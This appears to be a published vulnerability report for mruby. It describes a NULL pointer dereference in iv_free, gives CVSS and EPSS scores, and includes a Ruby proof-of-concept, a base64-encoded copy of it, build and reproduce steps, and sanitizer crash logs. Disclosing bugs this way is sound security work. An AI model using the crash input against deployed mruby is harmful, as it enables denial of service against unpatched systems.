Octaviogalland795DCBD9-1695-44BB-8C59-AD327C97C976in mruby/mruby
5.5 Medium
CVSS3
Attack Vector
LOCAL
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
UNCHANGED
Confidentiality Impact
NONE
Integrity Impact
NONE
Availability Impact
HIGH
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H
4.3 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
NONE
Availability Impact
PARTIAL
AV:N/AC:M/Au:N/C:N/I:N/A:P
0.001 Low
EPSS
Percentile
22.0%
Description
There is a NULL Pointer Dereference in iv_free (src/variable.c:232:20). This bug has been found on mruby lastest commit (hash 31fa3304049fc406a201a72293cce140f0557dca) on Ubuntu 20.04 for x86_64/amd64.
Proof of Concept
6.times{3.times{%]#{{}until-break
b={}
[**0,m:0]
s=0}]}}
Steps to reproduce
1- Clone repo and build with ASAN using MRUBY_CONFIG=build_config/clang-asan.rb rake
2- Use mruby to execute the poc:
$ echo -ne "Ni50aW1lc3szLnRpbWVzeyVdI3t7fXVudGlsLWJyZWFrCmI9e30KWyoqMCxtOjBdCnM9MH1dfX0=" | base64 -d > poc
$ build/host/bin/mruby ./poc
/home/faraday/mruby/src/variable.c:232:20: runtime error: member access within misaligned address 0x000000000001 for type 'iv_tbl' (aka 'struct iv_tbl'), which requires 8 byte alignment
0x000000000001: note: pointer points here
<memory cannot be printed>
SUMMARY: UndefinedBehaviorSanitizer: undefined-behavior /home/faraday/mruby/src/variable.c:232:20 in
/home/faraday/mruby/src/variable.c:232:20: runtime error: load of misaligned address 0x000000000009 for type 'mrb_value *' (aka 'struct mrb_value *'), which requires 8 byte alignment
0x000000000009: note: pointer points here
<memory cannot be printed>
SUMMARY: UndefinedBehaviorSanitizer: undefined-behavior /home/faraday/mruby/src/variable.c:232:20 in
AddressSanitizer:DEADLYSIGNAL
=================================================================
==10997==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000009 (pc 0x000000802ae6 bp 0x7ffc41eb8600 sp 0x7ffc41eb85d0 T0)
==10997==The signal is caused by a READ memory access.
==10997==Hint: address points to the zero page.
#0 0x802ae6 in iv_free /home/faraday/mruby/src/variable.c:232:20
#1 0x802f59 in mrb_gc_free_iv /home/faraday/mruby/src/variable.c:278:5
#2 0x6146ae in obj_free /home/faraday/mruby/src/gc.c:856:5
#3 0x607e21 in free_heap /home/faraday/mruby/src/gc.c:433:9
#4 0x60793c in mrb_gc_destroy /home/faraday/mruby/src/gc.c:442:3
#5 0x665405 in mrb_close /home/faraday/mruby/src/state.c:195:3
#6 0x4ca4ee in cleanup /home/faraday/mruby/mrbgems/mruby-bin-mruby/tools/mruby/mruby.c:262:3
#7 0x4c662a in main /home/faraday/mruby/mrbgems/mruby-bin-mruby/tools/mruby/mruby.c:368:3
#8 0x7f36f27bd0b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
#9 0x41c84d in _start (/home/faraday/mruby/build/host/bin/mruby+0x41c84d)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/faraday/mruby/src/variable.c:232:20 in iv_free
==10997==ABORTING
Running the same script with a release build (without asan) results in a segfault due to the invalid dereference.
Acknowledgements
This bug was found by Octavio Gianatiempo ([email protected]) and Octavio Galland ([email protected]) from Faraday Research Team.
Related
5.5 Medium
CVSS3
Attack Vector
LOCAL
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
UNCHANGED
Confidentiality Impact
NONE
Integrity Impact
NONE
Availability Impact
HIGH
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H
4.3 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
NONE
Availability Impact
PARTIAL
AV:N/AC:M/Au:N/C:N/I:N/A:P
0.001 Low
EPSS
Percentile
22.0%